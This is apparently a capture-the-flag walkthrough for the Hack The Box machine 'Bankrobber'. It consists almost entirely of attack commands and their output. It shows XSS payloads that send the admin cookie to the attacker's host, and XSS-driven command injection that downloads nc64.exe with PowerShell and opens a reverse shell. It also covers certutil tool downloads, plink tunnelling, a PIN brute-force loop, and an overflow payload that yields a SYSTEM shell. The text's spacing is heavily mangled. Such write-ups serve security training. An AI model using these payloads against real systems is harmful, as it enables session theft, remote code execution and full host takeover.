As always, first an nmap scan
root @ kali: ~ / htb / bankrobber # nmap -A 10.10.14.5 -oN AllPorts Starting Nmap 7.80 (https://nmap.org) at 2020-02-03 06:24 EST Nmap scan report for 10.10.14.5 Host is up (0.000051s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22 / tcp open ssh OpenSSH 7.9p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 2048 85: 9c: 65: 7b: ec: db: 65: ee: 28: 91: c7: 2e: 2f: e0: 22: 06 (RSA) | 256 72: bb: d3: 17: 56: d4: 0d: fe: cb: 3e: 64: c9: 5c: 7a: 41: a6 (ECDSA) | _ 256 66: 62: 0f: 03: e5: d8: 7f: e1: e8: dd: f2: ab: 17: 4c: a1: fc (ED25519) 111 / tcp open rpcbind 2-4 (RPC # 100000) | rpcinfo: | program version port / proto service | 100000 2,3,4 111 / tcp rpcbind | 100000 2,3,4 111 / udp rpcbind | 100000 3.4 111 / tcp6 rpcbind | _ 100000 3.4 111 / udp6 rpcbind 8000 / tcp open http SimpleHTTPServer 0.6 (Python 3.7.4) | _http-server-header: SimpleHTTP / 0.6 Python / 3.7.4 | _http-title: Directory listing for / Device type: general purpose Running: Linux 3.X OS CPE: cpe: / o: linux: linux_kernel: 3 OS details: Linux 3.7 - 3.10 Network Distance: 0 hops Service Info: OS: Linux; CPE: cpe: / o: linux: linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 12.88 seconds
Now we first create a new user, and then log in as this user
Then catch the admin cookie
<script> new Image (). src = "http://10.10.14.5:8000/bogus.php?output=" + document.cookie; </script>
or
<script> <img src = x onerror = this.src = 'http: //10.10.14.5: 8000 /? c =' + document.cookie> </script>
root @ kali: ~ / htb / # python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.154 - - [29 / Jan / 2020 03:24:29] code 404, message File not found 10.10.10.154 - - [29 / Jan / 2020 03:24:29] "GET /bogus.php?output=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP / 1.1" 404 -
then send an xss powershell iwr script
<script type = "text / javascript"> var Http = new XMLHttpRequest (); var url = '/ admin / backdoorchecker.php'; var params = 'cmd = dir | powershell -c "iwr -uri http://10.10.14.5:8000/nc64.exe -outfile% temp% \ a.exe";% temp% \ a.exe -e cmd.exe 10.10.14.5 1111 '; Http .open ("POST", url, true); Http.setRequestHeader ('Content-Type', 'application / x-www-form-urlencoded'); Http.send (params); </script>
If necessary, we check whether the admin auto apporoved (not necessarily necessary, only for checking)
first edit the admin cookie
catch the user shell
root @ kali: ~ / htb / bankrobber # rlwrap nc -nlvp 1111 listening on [any] 1111 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.154] 54090 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C: \ xampp \ htdocs \ admin> whoami whoami bank robber \ cortin C: \ xampp \ htdocs \ admin> cd c: \ users \ Cortin \ Desktop C: \ Users \ Cortin \ Desktop> type user.txt type user.txt f635346600876a43441cf1c6e94769ac
.
c: \ mkdir temp c: \ temp \ certutil -urlcache -split -f http://10.10.14.10:8000/plink.exe c: \ Temp \ plink.exe . \ plink.exe -R 3306: 127.0.0.1 : 3306 10.10.14.10
root @ kali: ~ / htb / bankrobber # mysql -u root -h 127.0.0.1 -p Enter password: Welcome to the MariaDB monitor. Commands end with; or \ g. Your MariaDB connection id is 1019 Server version: 10.1.38-MariaDB mariadb.org binary distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\ h' for help. Type '\ c' to clear the current input statement. MariaDB [(none)]> show databases; + -------------------- + | Database | + -------------------- + | bank robber | | information_scheme | | mysql | | performance_scheme | | phpmyadmin | | test | + -------------------- + 6 rows in set (0.091 sec) MariaDB [(none)]> select LOAD_FILE ('/ Users / Administrator / Desktop / root.txt'); MariaDB [(none)]> select LOAD_FILE ('/ Users / Cortin / Desktop / user.txt');
.
later after forcing the pin (after plink reverse shell c: \ temp \ plink.exe -R 4466: 127.0.0.1: 910 10.10.14.5 )
with script
or
root @ kali: ~ / htb / bankrobber # cat bandit.sh for x in {0..9} {0..9} {0..9} {0..9}; do echo $ x | nc 192.168.1.139 910 | egrep -v "correct"; echo "Try $ x"; done
turned out to be this: 0021
C: \ temp \ certutil -urlcache -split -f http://10.10.14.5:8000/nc64.exe c: \ temp \ nc64.exe C: \ temp \ certutil -urlcache -split -f http://10.10.14.5:8000/plink.exe c: \ temp \ plink.exe . \ Plink.exe -R 4466: 127.0.0.1: 910 10.10.14.5
root @ kali: ~ / htb / bankrobber # netstat -ano | grep 4455 tcp 0 0 127.0.0.1:4455 0.0.0.0:* LISTEN off (0.00 / 0/0) tcp6 0 0 :: 1: 4455 ::: * LISTEN off (0.00 / 0/0) root @ kali: ~ / htb / bankrobber # nc 127.0.0.1 4455 ----------------------------------- --------------------------- Internet E-Coin Transfer System International Bank of Sun church v0.1 by Gio & Cneeliz ----- -------------------------------------------------- ------- Please enter your super secret 4 digit PIN code to login: [$] 0021 [$] PIN is correct, access granted! -------------------------------------------------- ------------ Please enter the amount of e-coins you would like to transfer: [$] 1 [$] Transfering $ 1 using our e-coin transfer application. [$] Executing e-coin transfer tool: C: \ Users \ admin \ Documents \ transfer.exe [$] Transaction in progress, you can safely disconnect ...
c: \ bankv2.exe is Vulnerable to an ”Integer Overflow”
it appeared after asking on forum that it was about 32 A characters
I used numbers instead of A’s so:
12345678901234567890123456789012
after this the payload must be executed
My payload was –
12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236
root @ kali: ~ / htb / bankrobber # nc 127.0.0.1 4455 -------------------------------------------------- ------------ Internet E-Coin Transfer System International Bank of Sun church v0.1 by Gio & Cneeliz -------------------------------------------------- ------------ Please enter your super secret 4 digit PIN code to login: [$] 0021 [$] PIN correct, access granted! -------------------------------------------------- ------------ Please enter the amount of e-coins you would like to transfer: [$] 12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236 [$] Transfer $ 12345678901234567890123456789012C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236 using our e-coin transfer application. [$] Executing e-coin transfer tool: C: \ temp \ nc64.exe -e cmd.exe 10.10.14.5 1236 [$] Transaction in progress, you can safely disconnect ...
root @ kali: / opt / evil-winrm # rlwrap nc -nlvp 1236 listening on [any] 1236 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.154] 49759 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C: \ Windows \ system32> whoami whoami nt authority \ system C: \ Windows \ system32> cd c: \ users \ admin \ desktop cd c: \ users \ admin \ desktop c: \ Users \ admin \ Desktop> type root.txt type root.txt aa65d8e6216585ea636eb07d4a59b197 c: \ Users \ admin \ Desktop>
Author: Puckiestyle